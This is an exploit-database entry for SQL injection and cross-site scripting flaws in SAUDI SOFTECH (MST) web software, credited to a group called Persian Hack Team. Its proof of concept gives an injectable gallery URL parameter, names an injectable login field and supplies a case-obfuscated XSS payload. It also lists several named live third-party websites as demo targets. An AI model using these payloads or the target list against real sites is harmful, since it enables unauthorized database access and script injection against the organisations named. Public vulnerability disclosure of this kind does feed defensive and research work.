SAUDI SOFTECH (MST) - SQL Injection / Cross Site Scripting

2016.06.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89

###################### # Exploit Title : SAUDI SOFTECH (MST) - SQL Injection / Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.saudisoftech.com/ # Category: [ Webapps ] # Tested on: [ Win ] # Date: 2016/06/05 # Version : V.5.0.1 ###################### # # PoC: # 1-1-Get SQL Injection # Demo : # http://www.saudiacademy.edu.sa/gallery.php?gid=4%27 # http://www.zamilshipyard.com/gallery.php?gid=2%27 # # 1-2-Post SQL Injection # email Parameter in Login page vulnerable # Demo: # http://www.zamilshipyard.com/panel/index.php # # 2-Cross Site Scripting # Search Box vulnerable to XSS # Payload = <ScRiPt >prompt("Persian Hack Team")</ScRiPt> # Demo : # http://www.btech-sa.com/search.php # http://www.speetech.net/search.php # http://www.madicc.org/search.php # ###################### # Discovered by : Mojtaba MobhaM & T3NZOG4N & FireKernel # Greetz : Milad Hacking & JOK3R & All Iranian Hackers And All Persian Hack Team Members # Homepage : persian-team.ir ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2026, cxsecurity.com

 

Back to Top